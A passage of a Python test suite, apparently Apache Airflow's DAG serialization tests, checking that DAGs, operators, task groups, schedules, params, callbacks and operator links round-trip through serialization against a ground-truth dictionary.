k8s.V1Container(name="base", volume_mounts=[k8s.V1VolumeMount(name="my-vol", mount_path="/vol/")]) ] ), ) serialized_simple_dag_ground_truth = { "__version": 1, "dag": { "default_args": { "__type": "dict", "__var": { "depends_on_past": False, "retries": 1, "retry_delay": {"__type": "timedelta", "__var": 300.0}, "max_retry_delay": {"__type": "timedelta", "__var": 600.0}, "sla": {"__type": "timedelta", "__var": 100.0}, }, }, "start_date": 1564617600.0, '_task_group': { '_group_id': None, 'prefix_group_id': True, 'children': {'bash_task': ('operator', 'bash_task'), 'custom_task': ('operator', 'custom_task')}, 'tooltip': '', 'ui_color': 'CornflowerBlue', 'ui_fgcolor': '#000', 'upstream_group_ids': [], 'downstream_group_ids': [], 'upstream_task_ids': [], 'downstream_task_ids': [], }, "is_paused_upon_creation": False, "_dag_id": "simple_dag", "doc_md": "### DAG Tutorial Documentation", "fileloc": None, "tasks": [ { "task_id": "bash_task", "owner": "airflow", "retries": 1, "retry_delay": 300.0, "max_retry_delay": 600.0, "sla": 100.0, "_downstream_task_ids": [], "_inlets": [], "_is_dummy": False, "_outlets": [], "ui_color": "#f0ede4", "ui_fgcolor": "#000", "template_fields": ['bash_command', 'env'], "template_fields_renderers": {'bash_command': 'bash', 'env': 'json'}, "bash_command": "echo {{ task.task_id }}", 'label': 'bash_task', "_task_type": "BashOperator", "_task_module": "airflow.operators.bash", "pool": "default_pool", "executor_config": { '__type': 'dict', '__var': { "pod_override": { '__type': 'k8s.V1Pod', '__var': PodGenerator.serialize_pod(executor_config_pod), } }, }, "doc_md": "### Task Tutorial Documentation", }, { "task_id": "custom_task", "retries": 1, "retry_delay": 300.0, "max_retry_delay": 600.0, "sla": 100.0, "_downstream_task_ids": [], "_inlets": [], "_is_dummy": False, "_outlets": [], "_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}], "ui_color": "#fff", "ui_fgcolor": "#000", "template_fields": ['bash_command'], 
"template_fields_renderers": {}, "_task_type": "CustomOperator", "_task_module": "tests.test_utils.mock_operators", "pool": "default_pool", 'label': 'custom_task', }, ], "timezone": "UTC", "_access_control": { "__type": "dict", "__var": { "test_role": { "__type": "set", "__var": [permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT], } }, }, "edge_info": {}, "dag_dependencies": [], }, } ROOT_FOLDER = os.path.realpath( os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir) ) def make_example_dags(module_path): """Loads DAGs from a module for test.""" dagbag = DagBag(module_path) return dagbag.dags def make_simple_dag(): """Make very simple DAG to verify serialization result.""" with DAG( dag_id='simple_dag', default_args={ "retries": 1, "retry_delay": timedelta(minutes=5), "max_retry_delay": timedelta(minutes=10), "depends_on_past": False, "sla": timedelta(seconds=100), }, start_date=datetime(2019, 8, 1), is_paused_upon_creation=False, access_control={"test_role": {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT}}, doc_md="### DAG Tutorial Documentation", ) as dag: CustomOperator(task_id='custom_task') BashOperator( task_id='bash_task', bash_command='echo {{ task.task_id }}', owner='airflow', executor_config={"pod_override": executor_config_pod}, doc_md="### Task Tutorial Documentation", ) return {'simple_dag': dag} def make_user_defined_macro_filter_dag(): """Make DAGs with user defined macros and filters using locally defined methods. For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``. The examples here test: (1) functions can be successfully displayed on UI; (2) templates with function macros have been rendered before serialization. 
""" def compute_next_execution_date(dag, execution_date): return dag.following_schedule(execution_date) default_args = {'start_date': datetime(2019, 7, 10)} dag = DAG( 'user_defined_macro_filter_dag', default_args=default_args, user_defined_macros={ 'next_execution_date': compute_next_execution_date, }, user_defined_filters={'hello': lambda name: f'Hello {name}'}, catchup=False, ) BashOperator( task_id='echo', bash_command='echo "{{ next_execution_date(dag, execution_date) }}"', dag=dag, ) return {dag.dag_id: dag} def collect_dags(dag_folder=None): """Collects DAGs to test.""" dags = {} dags.update(make_simple_dag()) dags.update(make_user_defined_macro_filter_dag()) if dag_folder: if isinstance(dag_folder, (list, tuple)): patterns = dag_folder else: patterns = [dag_folder] else: patterns = [ "airflow/example_dags", "airflow/providers/*/example_dags", "airflow/providers/*/*/example_dags", ] for pattern in patterns: for directory in glob(f"{ROOT_FOLDER}/{pattern}"): dags.update(make_example_dags(directory)) # Filter subdags as they are stored in same row in Serialized Dag table dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag} return dags def serialize_subprocess(queue, dag_folder): """Validate pickle in a subprocess.""" dags = collect_dags(dag_folder) for dag in dags.values(): queue.put(SerializedDAG.to_json(dag)) queue.put(None) class TestStringifiedDAGs(unittest.TestCase): """Unit tests for stringified DAGs.""" def setUp(self): super().setUp() BaseHook.get_connection = mock.Mock( return_value=Connection( extra=( '{' '"project_id": "mock", ' '"location": "mock", ' '"instance": "mock", ' '"database_type": "postgres", ' '"use_proxy": "False", ' '"use_ssl": "False"' '}' ) ) ) self.maxDiff = None def test_serialization(self): """Serialization and deserialization should work for every DAG and Operator.""" dags = collect_dags() serialized_dags = {} for _, v in dags.items(): dag = SerializedDAG.to_dict(v) SerializedDAG.validate_schema(dag) 
serialized_dags[v.dag_id] = dag # Compares with the ground truth of JSON string. self.validate_serialized_dag(serialized_dags['simple_dag'], serialized_simple_dag_ground_truth) def validate_serialized_dag(self, json_dag, ground_truth_dag): """Verify serialized DAGs match the ground truth.""" assert json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py' json_dag['dag']['fileloc'] = None def sorted_serialized_dag(dag_dict: dict): """ Sorts the "tasks" list and "access_control" permissions in the serialised dag python dictionary. This is needed as the order of items should not matter but assertEqual would fail if the order of items changes in the dag dictionary """ dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"], key=lambda x: sorted(x.keys())) dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted( dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] ) return dag_dict assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag) def test_deserialization_across_process(self): """A serialized DAG can be deserialized in another process.""" # Since we need to parse the dags twice here (once in the subprocess, # and once here to get a DAG to compare to) we don't want to load all # dags. queue = multiprocessing.Queue() proc = multiprocessing.Process(target=serialize_subprocess, args=(queue, "airflow/example_dags")) proc.daemon = True proc.start() stringified_dags = {} while True: v = queue.get() if v is None: break dag = SerializedDAG.from_json(v) assert isinstance(dag, DAG) stringified_dags[dag.dag_id] = dag dags = collect_dags("airflow/example_dags") assert set(stringified_dags.keys()) == set(dags.keys()) # Verify deserialized DAGs. 
for dag_id in stringified_dags: self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id]) def test_roundtrip_provider_example_dags(self): dags = collect_dags( [ "airflow/providers/*/example_dags", "airflow/providers/*/*/example_dags", ] ) # Verify deserialized DAGs. for dag in dags.values(): serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag)) self.validate_deserialized_dag(serialized_dag, dag) def validate_deserialized_dag(self, serialized_dag, dag): """ Verify that all example DAGs work with DAG Serialization by checking fields between Serialized Dags & non-Serialized Dags """ fields_to_check = dag.get_serialized_fields() - { # Doesn't implement __eq__ properly. Check manually 'timezone', # Need to check fields in it, to exclude functions 'default_args', "_task_group", } for field in fields_to_check: assert getattr(serialized_dag, field) == getattr( dag, field ), f'{dag.dag_id}.{field} does not match' if dag.default_args: for k, v in dag.default_args.items(): if callable(v): # Check we stored _something_. assert k in serialized_dag.default_args else: assert ( v == serialized_dag.default_args[k] ), f'{dag.dag_id}.default_args[{k}] does not match' assert serialized_dag.timezone.name == dag.timezone.name for task_id in dag.task_ids: self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id)) # Verify that the DAG object has 'full_filepath' attribute # and is equal to fileloc assert serialized_dag.full_filepath == dag.fileloc def validate_deserialized_task( self, serialized_task, task, ): """Verify non-airflow operators are casted to BaseOperator.""" assert isinstance(serialized_task, SerializedBaseOperator) assert not isinstance(task, SerializedBaseOperator) assert isinstance(task, BaseOperator) fields_to_check = task.get_serialized_fields() - { # Checked separately '_task_type', 'subdag', # Type is excluded, so don't check it '_log', # List vs tuple. 
Check separately 'template_fields', # We store the string, real dag has the actual code 'on_failure_callback', 'on_success_callback', 'on_retry_callback', # Checked separately 'resources', } assert serialized_task.task_type == task.task_type assert set(serialized_task.template_fields) == set(task.template_fields) assert serialized_task.upstream_task_ids == task.upstream_task_ids assert serialized_task.downstream_task_ids == task.downstream_task_ids for field in fields_to_check: assert getattr(serialized_task, field) == getattr( task, field ), f'{task.dag.dag_id}.{task.task_id}.{field} does not match' if serialized_task.resources is None: assert task.resources is None or task.resources == [] else: assert serialized_task.resources == task.resources # Check that for Deserialised task, task.subdag is None for all other Operators # except for the SubDagOperator where task.subdag is an instance of DAG object if task.task_type == "SubDagOperator": assert serialized_task.subdag is not None assert isinstance(serialized_task.subdag, DAG) else: assert serialized_task.subdag is None @parameterized.expand( [ (datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)), ( datetime(2019, 8, 1, tzinfo=timezone.utc), datetime(2019, 8, 2, tzinfo=timezone.utc), datetime(2019, 8, 2, tzinfo=timezone.utc), ), ( datetime(2019, 8, 1, tzinfo=timezone.utc), datetime(2019, 7, 30, tzinfo=timezone.utc), datetime(2019, 8, 1, tzinfo=timezone.utc), ), (pendulum.datetime(2019, 8, 1, tz='UTC'), None, pendulum.datetime(2019, 8, 1, tz='UTC')), ] ) def test_deserialization_start_date(self, dag_start_date, task_start_date, expected_task_start_date): dag = DAG(dag_id='simple_dag', start_date=dag_start_date) BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date) serialized_dag = SerializedDAG.to_dict(dag) if not task_start_date or dag_start_date >= task_start_date: # If dag.start_date > task.start_date -> task.start_date=dag.start_date # because of the 
logic in dag.add_task() assert "start_date" not in serialized_dag["dag"]["tasks"][0] else: assert "start_date" in serialized_dag["dag"]["tasks"][0] dag = SerializedDAG.from_dict(serialized_dag) simple_task = dag.task_dict["simple_task"] assert simple_task.start_date == expected_task_start_date def test_deserialization_with_dag_context(self): with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1, tzinfo=timezone.utc)) as dag: BaseOperator(task_id='simple_task') # should not raise RuntimeError: dictionary changed size during iteration SerializedDAG.to_dict(dag) @parameterized.expand( [ (datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)), ( datetime(2019, 8, 1, tzinfo=timezone.utc), datetime(2019, 8, 2, tzinfo=timezone.utc), datetime(2019, 8, 1, tzinfo=timezone.utc), ), ( datetime(2019, 8, 1, tzinfo=timezone.utc), datetime(2019, 7, 30, tzinfo=timezone.utc), datetime(2019, 7, 30, tzinfo=timezone.utc), ), ] ) def test_deserialization_end_date(self, dag_end_date, task_end_date, expected_task_end_date): dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1), end_date=dag_end_date) BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date) serialized_dag = SerializedDAG.to_dict(dag) if not task_end_date or dag_end_date <= task_end_date: # If dag.end_date < task.end_date -> task.end_date=dag.end_date # because of the logic in dag.add_task() assert "end_date" not in serialized_dag["dag"]["tasks"][0] else: assert "end_date" in serialized_dag["dag"]["tasks"][0] dag = SerializedDAG.from_dict(serialized_dag) simple_task = dag.task_dict["simple_task"] assert simple_task.end_date == expected_task_end_date @parameterized.expand( [ (None, None, NullTimetable()), ("@weekly", "@weekly", cron_timetable("0 0 * * 0")), ("@once", "@once", OnceTimetable()), ( {"__type": "timedelta", "__var": 86400.0}, timedelta(days=1), delta_timetable(timedelta(days=1)), ), ] ) def test_deserialization_schedule_interval( self, 
serialized_schedule_interval, expected_schedule_interval, expected_timetable, ): serialized = { "__version": 1, "dag": { "default_args": {"__type": "dict", "__var": {}}, "_dag_id": "simple_dag", "fileloc": __file__, "tasks": [], "timezone": "UTC", "schedule_interval": serialized_schedule_interval, }, } SerializedDAG.validate_schema(serialized) dag = SerializedDAG.from_dict(serialized) assert dag.schedule_interval == expected_schedule_interval assert dag.timetable == expected_timetable @parameterized.expand( [ (relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}), (relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}), # Every friday (relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}), # Every second friday (relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}}), ] ) def test_roundtrip_relativedelta(self, val, expected): serialized = SerializedDAG._serialize(val) assert serialized == expected round_tripped = SerializedDAG._deserialize(serialized) assert val == round_tripped @parameterized.expand( [ (None, {}), ({"param_1": "value_1"}, {"param_1": "value_1"}), ] ) def test_dag_params_roundtrip(self, val, expected_val): """ Test that params work both on Serialized DAGs & Tasks """ dag = DAG(dag_id='simple_dag', params=val) BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1)) serialized_dag = SerializedDAG.to_dict(dag) if val: assert "params" in serialized_dag["dag"] else: assert "params" not in serialized_dag["dag"] deserialized_dag = SerializedDAG.from_dict(serialized_dag) deserialized_simple_task = deserialized_dag.task_dict["simple_task"] assert expected_val == deserialized_dag.params assert expected_val == deserialized_simple_task.params @parameterized.expand( [ (None, {}), ({"param_1": "value_1"}, {"param_1": "value_1"}), ] ) def test_task_params_roundtrip(self, val, expected_val): """ Test that params work 
both on Serialized DAGs & Tasks """ dag = DAG(dag_id='simple_dag') BaseOperator(task_id='simple_task', dag=dag, params=val, start_date=datetime(2019, 8, 1)) serialized_dag = SerializedDAG.to_dict(dag) if val: assert "params" in serialized_dag["dag"]["tasks"][0] else: assert "params" not in serialized_dag["dag"]["tasks"][0] deserialized_dag = SerializedDAG.from_dict(serialized_dag) deserialized_simple_task = deserialized_dag.task_dict["simple_task"] assert expected_val == deserialized_simple_task.params def test_extra_serialized_field_and_operator_links(self): """ Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links. This tests also depends on GoogleLink() registered as a plugin in tests/plugins/test_plugin.py The function tests that if extra operator links are registered in plugin in ``operator_extra_links`` and the same is also defined in the Operator in ``BaseOperator.operator_extra_links``, it has the correct extra link. """ test_date = datetime(2019, 8, 1) dag = DAG(dag_id='simple_dag', start_date=test_date) CustomOperator(task_id='simple_task', dag=dag, bash_command="true") serialized_dag = SerializedDAG.to_dict(dag) assert "bash_command" in serialized_dag["dag"]["tasks"][0] dag = SerializedDAG.from_dict(serialized_dag) simple_task = dag.task_dict["simple_task"] assert getattr(simple_task, "bash_command") == "true" ######################################################### # Verify Operator Links work with Serialized Operator ######################################################### # Check Serialized version of operator link only contains the inbuilt Op Link assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [ {'tests.test_utils.mock_operators.CustomOpLink': {}} ] # Test all the extra_links are set assert set(simple_task.extra_links) == {'Google Custom', 'airflow', 'github', 'google'} ti = TaskInstance(task=simple_task, execution_date=test_date) ti.xcom_push('search_query', "dummy_value_1") # Test 
Deserialized inbuilt link custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name) assert 'http://google.com/custom_base_link?search=dummy_value_1' == custom_inbuilt_link # Test Deserialized link registered via Airflow Plugin google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name) assert "https://www.google.com" == google_link_from_plugin def test_extra_operator_links_logs_error_for_non_registered_extra_links(self): """ Assert OperatorLinks not registered via Plugins and if it is not an inbuilt Operator Link, it can still deserialize the DAG (does not error) but just logs an error """ class TaskStateLink(BaseOperatorLink): """OperatorLink not registered via Plugins nor a built-in OperatorLink""" name = 'My Link' def get_link(self, operator, dttm): return 'https://www.google.com' class MyOperator(BaseOperator): """Just a DummyOperator using above defined Extra Operator Link""" operator_extra_links = [TaskStateLink()] def execute(self, context): pass with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1)) as dag: MyOperator(task_id='blah') serialized_dag = SerializedDAG.to_dict(dag) with self.assertLogs("airflow.serialization.serialized_objects", level="ERROR") as log_output: SerializedDAG.from_dict(serialized_dag) received_logs = log_output.output[0] expected_err_msg = ( "Operator Link class 'tests.serialization.test_dag_serialization.TaskStateLink' " "not registered" ) assert expected_err_msg in received_logs def test_extra_serialized_field_and_multiple_operator_links(self): """ Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links. This tests also depends on GoogleLink() registered as a plugin in tests/plugins/test_plugin.py The function tests that if extra operator links are registered in plugin in ``operator_extra_links`` and the same is also defined in the Operator in ``BaseOperator.operator_extra_links``, it has the correct extra link. 
""" test_date = datetime(2019, 8, 1) dag = DAG(dag_id='simple_dag', start_date=test_date) CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"]) serialized_dag = SerializedDAG.to_dict(dag) assert "bash_command" in serialized_dag["dag"]["tasks"][0] dag = SerializedDAG.from_dict(serialized_dag) simple_task = dag.task_dict["simple_task"] assert getattr(simple_task, "bash_command") == ["echo", "true"] ######################################################### # Verify Operator Links work with Serialized Operator ######################################################### # Check Serialized version of operator link only contains the inbuilt Op Link assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [ {'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}}, {'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}}, ] # Test all the extra_links are set assert set(simple_task.extra_links) == { 'BigQuery Console #1', 'BigQuery Console #2', 'airflow', 'github', 'google', } ti = TaskInstance(task=simple_task, execution_date=test_date) ti.xcom_push('search_query', ["dummy_value_1", "dummy_value_2"]) # Test Deserialized inbuilt link #1 custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1") assert 'https://console.cloud.google.com/bigquery?j=dummy_value_1' == custom_inbuilt_link # Test Deserialized inbuilt link #2 custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2") assert 'https://console.cloud.google.com/bigquery?j=dummy_value_2' == custom_inbuilt_link # Test Deserialized link registered via Airflow Plugin google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name) assert "https://www.google.com" == google_link_from_plugin class ClassWithCustomAttributes: """ Class for testing purpose: allows to create objects with custom attributes in one single statement. 
""" def __init__(self, **kwargs): for key, value in kwargs.items(): setattr(self, key, value) def __str__(self): return f"{self.__class__.__name__}({str(self.__dict__)})" def __repr__(self): return self.__str__() def __eq__(self, other): return self.__dict__ == other.__dict__ def __ne__(self, other): return not self.__eq__(other) @parameterized.expand( [ (None, None), ([], []), ({}, {}), ("{{ task.task_id }}", "{{ task.task_id }}"), (["{{ task.task_id }}", "{{ task.task_id }}"]), ({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}), ({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}), ( [{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}], [{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}], ), ( {"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}}, {"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}}, ), ( ClassWithCustomAttributes( att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"] ), "ClassWithCustomAttributes(" "{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})", ), ( ClassWithCustomAttributes( nested1=ClassWithCustomAttributes( att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"] ), nested2=ClassWithCustomAttributes( att3="{{ task.task_id }}", att4="{{ task.task_id }}", template_fields=["att3"] ), template_fields=["nested1"], ), "ClassWithCustomAttributes(" "{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', " "'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), " "'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', 'att4': " "'{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})", ), ] ) def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field): """ Test that templated_fields exists for all Operators in Serialized DAG Since we don't want to inflate arbitrary python 
objects (it poses a RCE/security risk etc.) we want check that non-"basic" objects are turned in to strings after deserializing. """ dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1)) with dag: BashOperator(task_id="test", bash_command=templated_field) serialized_dag = SerializedDAG.to_dict(dag) deserialized_dag = SerializedDAG.from_dict(serialized_dag) deserialized_test_task = deserialized_dag.task_dict["test"] assert expected_field == getattr(deserialized_test_task, "bash_command") def test_dag_serialized_fields_with_schema(self): """ Additional Properties are disabled on DAGs. This test verifies that all the keys in DAG.get_serialized_fields are listed in Schema definition. """ dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"] # The parameters we add manually in Serialization needs to be ignored ignored_keys: set = { "is_subdag", "tasks", "has_on_success_callback", "has_on_failure_callback", "dag_dependencies", } keys_for_backwards_compat: set = { "_concurrency", } dag_params: set = set(dag_schema.keys()) - ignored_keys - keys_for_backwards_compat assert set(DAG.get_serialized_fields()) == dag_params def test_operator_subclass_changing_base_defaults(self): assert ( BaseOperator(task_id='dummy').do_xcom_push is True ), "Precondition check! If this fails the test won't make sense" class MyOperator(BaseOperator): def __init__(self, do_xcom_push=False, **kwargs): super().__init__(**kwargs) self.do_xcom_push = do_xcom_push op = MyOperator(task_id='dummy') assert op.do_xcom_push is False blob = SerializedBaseOperator.serialize_operator(op) serialized_op = SerializedBaseOperator.deserialize_operator(blob) assert serialized_op.do_xcom_push is False def test_no_new_fields_added_to_base_operator(self): """ This test verifies that there are no new fields added to BaseOperator. And reminds that tests should be added for it. 
""" base_operator = BaseOperator(task_id="10") fields = base_operator.__dict__ assert { '_BaseOperator__instantiated': True, '_dag': None, '_downstream_task_ids': set(), '_inlets': [], '_log': base_operator.log, '_outlets': [], '_upstream_task_ids': set(), 'depends_on_past': False, 'do_xcom_push': True, 'doc': None, 'doc_json': None, 'doc_md': None, 'doc_rst': None, 'doc_yaml': None, 'email': None, 'email_on_failure': True, 'email_on_retry': True, 'end_date': None, 'execution_timeout': None, 'executor_config': {}, 'inlets': [], 'label': '10', 'max_retry_delay': None, 'on_execute_callback': None, 'on_failure_callback': None, 'on_retry_callback': None, 'on_success_callback': None, 'outlets': [], 'owner': 'airflow', 'params': {}, 'pool': 'default_pool', 'pool_slots': 1, 'priority_weight': 1, 'queue': 'default', 'resources': None, 'retries': 0, 'retry_delay': timedelta(0, 300), 'retry_exponential_backoff': False, 'run_as_user': None, 'sla': None, 'start_date': None, 'subdag': None, 'task_concurrency': None, 'task_id': '10', 'trigger_rule': 'all_success', 'wait_for_downstream': False, 'weight_rule': 'downstream', } == fields, """ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY Some fields were added to the BaseOperator! Please add them to the list above and make sure that you add support for DAG serialization - you should add the field to `airflow/serialization/schema.json` - they should have correct type defined there. Note that we do not support versioning yet so you should only add optional fields to BaseOperator. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! """ def test_task_group_serialization(self): """ Test TaskGroup serialization/deserialization. 
""" from airflow.operators.dummy import DummyOperator from airflow.utils.task_group import TaskGroup execution_date = datetime(2020, 1, 1) with DAG("test_task_group_serialization", start_date=execution_date) as dag: task1 = DummyOperator(task_id="task1") with TaskGroup("group234") as group234: _ = DummyOperator(task_id="task2") with TaskGroup("group34") as group34: _ = DummyOperator(task_id="task3") _ = DummyOperator(task_id="task4") task5 = DummyOperator(task_id="task5") task1 >> group234 group34 >> task5 dag_dict = SerializedDAG.to_dict(dag) SerializedDAG.validate_schema(dag_dict) json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag)) self.validate_deserialized_dag(json_dag, dag) serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag)) assert serialized_dag.task_group.children assert serialized_dag.task_group.children.keys() == dag.task_group.children.keys() def check_task_group(node): try: children = node.children.values() except AttributeError: # Round-trip serialization and check the result expected_serialized = SerializedBaseOperator.serialize_operator(dag.get_task(node.task_id)) expected_deserialized = SerializedBaseOperator.deserialize_operator(expected_serialized) expected_dict = SerializedBaseOperator.serialize_operator(expected_deserialized) assert node assert SerializedBaseOperator.serialize_operator(node) == expected_dict return for child in children: check_task_group(child) check_task_group(serialized_dag.task_group) def test_edge_info_serialization(self): """ Tests edge_info serialization/deserialization. 
""" from airflow.operators.dummy import DummyOperator from airflow.utils.edgemodifier import Label with DAG("test_edge_info_serialization", start_date=datetime(2020, 1, 1)) as dag: task1 = DummyOperator(task_id="task1") task2 = DummyOperator(task_id="task2") task1 >> Label("test label") >> task2 dag_dict = SerializedDAG.to_dict(dag) SerializedDAG.validate_schema(dag_dict) json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag)) self.validate_deserialized_dag(json_dag, dag) serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag)) assert serialized_dag.edge_info == dag.edge_info @parameterized.expand( [ ("poke", False), ("reschedule", True), ] ) def test_serialize_sensor(self, mode, expect_custom_deps): from airflow.sensors.base import BaseSensorOperator class DummySensor(BaseSensorOperator): def poke(self, context): return False op = DummySensor(task_id='dummy', mode=mode, poke_interval=23) blob = SerializedBaseOperator.serialize_operator(op) if expect_custom_deps: assert "deps" in blob else: assert "deps" not in blob serialized_op = SerializedBaseOperator.deserialize_operator(blob) assert op.deps == serialized_op.deps @parameterized.expand( [ ({"on_success_callback": lambda x: print("hi")}, True), ({}, False), ] ) def test_dag_on_success_callback_roundtrip(self, passed_success_callback, expected_value): """ Test that when on_success_callback is passed to the DAG, has_on_success_callback is stored in Serialized JSON blob. And when it is de-serialized dag.has_on_success_callback is set to True. 
When the callback is not set, has_on_success_callback should not be stored in Serialized blob and so default to False on de-serialization """ dag = DAG(dag_id='test_dag_on_success_callback_roundtrip', **passed_success_callback) BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1)) serialized_dag = SerializedDAG.to_dict(dag) if expected_value: assert "has_on_success_callback" in serialized_dag["dag"] else: assert "has_on_success_callback" not in serialized_dag["dag"] deserialized_dag = SerializedDAG.from_dict(serialized_dag) assert deserialized_dag.has_on_success_callback is expected_value @parameterized.expand( [ ({"on_failure_callback": lambda x: print("hi")}, True), ({}, False), ] ) def test_dag_on_failure_callback_roundtrip(self, passed_failure_callback, expected_value): """ Test that when on_failure_callback is passed to the DAG, has_on_failure_callback is stored in Serialized JSON blob. And when it is de-serialized dag.has_on_failure_callback is set to True. 
When the callback is not set, has_on_failure_callback should not be stored in Serialized blob and so default to False on de-serialization """ dag = DAG(dag_id='test_dag_on_failure_callback_roundtrip', **passed_failure_callback) BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1)) serialized_dag = SerializedDAG.to_dict(dag) if expected_value: assert "has_on_failure_callback" in serialized_dag["dag"] else: assert "has_on_failure_callback" not in serialized_dag["dag"] deserialized_dag = SerializedDAG.from_dict(serialized_dag) assert deserialized_dag.has_on_failure_callback is expected_value @parameterized.expand( [ ( ['task_1', 'task_5', 'task_2', 'task_4'], ['task_1', 'task_5', 'task_2', 'task_4'], ), ( {'task_1', 'task_5', 'task_2', 'task_4'}, ['task_1', 'task_2', 'task_4', 'task_5'], ), ( ('task_1', 'task_5', 'task_2', 'task_4'), ['task_1', 'task_5', 'task_2', 'task_4'], ), ( { "staging_schema": [ {"key:": "foo", "value": "bar"}, {"key:": "this", "value": "that"}, "test_conf", ] }, { "staging_schema": [ {"__type": "dict", "__var": {"key:": "foo", "value": "bar"}}, { "__type": "dict", "__var": {"key:": "this", "value": "that"}, }, "test_conf", ] }, ), ( {"task3": "test3", "task2": "test2", "task1": "test1"}, {"task1": "test1", "task2": "test2", "task3": "test3"}, ), ( ('task_1', 'task_5', 'task_2', 3, ["x", "y"]), ['task_1', 'task_5', 'task_2', 3, ["x", "y"]], ), ] ) def test_serialized_objects_are_sorted(self, object_to_serialized, expected_output): """Test Serialized Sets are sorted while list and tuple preserve order""" serialized_obj = SerializedDAG._serialize(object_to_serialized) if isinstance(serialized_obj, dict) and "__type" in serialized_obj: serialized_obj = serialized_obj["__var"] assert serialized_obj == expected_output def test_kubernetes_optional(): """Serialisation / deserialisation continues to work without kubernetes installed""" def mock__import__(name, globals_=None, locals_=None, fromlist=(), level=0): if level == 0 and 
name.partition('.')[0] == 'kubernetes': raise ImportError("No module named 'kubernetes'") return importlib.__import__(name, globals=globals_, locals=locals_, fromlist=fromlist, level=level) with mock.patch('builtins.__import__', side_effect=mock__import__) as import_mock: # load module from scratch, this does not replace any already imported # airflow.serialization.serialized_objects module in sys.modules spec = importlib.util.find_spec("airflow.serialization.serialized_objects") module = importlib.util.module_from_spec(spec) spec.loader.exec_module(module) # if we got this far, the module did not try to load kubernetes, but # did it try to access airflow.kubernetes.*? imported_airflow = { c.args[0].split('.', 2)[1] for c in import_mock.call_args_list if c.args[0].startswith("airflow.") } assert "kubernetes" not in imported_airflow # pod loading is not supported when kubernetes is not available pod_override = { '__type': 'k8s.V1Pod', '__var': PodGenerator.serialize_pod(executor_config_pod), } with pytest.raises(RuntimeError): module.BaseSerialization.from_dict(pod_override) # basic serialization should succeed module.SerializedDAG.to_dict(make_simple_dag()["simple_dag"])
# ===== test_io.py (start of the next concatenated file) =====
